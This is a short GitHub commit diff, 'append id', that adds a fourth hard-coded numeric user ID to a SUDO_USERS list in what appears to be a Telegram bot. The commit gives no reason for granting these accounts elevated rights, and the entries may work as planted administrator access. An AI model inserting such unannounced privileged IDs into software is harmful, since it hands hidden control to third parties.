append id

This commit is contained in:
levina 2022-02-08 20:48:21 +07:00 committed by GitHub
parent fd73e84f06
commit 71cc519dc9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -8,6 +8,7 @@ from driver.admins import get_administrators
SUDO_USERS.append(1757169682)
SUDO_USERS.append(1738637033)
SUDO_USERS.append(1448474573)
SUDO_USERS.append(859229457)
def errors(func: Callable) -> Callable: